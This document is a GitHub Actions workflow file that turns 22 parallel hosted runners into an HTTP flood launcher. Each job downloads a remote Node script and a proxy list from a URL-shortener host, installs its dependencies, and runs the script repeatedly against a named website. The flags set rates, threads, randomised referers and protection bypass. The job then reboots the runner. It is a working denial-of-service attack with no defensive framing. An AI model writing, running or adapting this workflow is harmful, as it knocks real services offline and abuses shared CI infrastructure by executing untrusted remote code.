name: Ubuntu VDS 50 saniye pro.j

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 22
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/JqoH1/prov2.js
          wget https://curl.by/19kka/fres.txt
          chmod +x prov2.js
          npm i axios hpack
          PIDS=()
          for i in {1..4}; do
            timeout 105 node prov2.js GET https://graph.vshield.pro/ 120 16 90 fres.txt --query 1 --cookie "uh=good" --delay 1 --bfm true --referer rand --postdata "user=f&pass=%RAND%" --debug --randrate --full
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 105
        
      - name: OK !
        run: sudo reboot
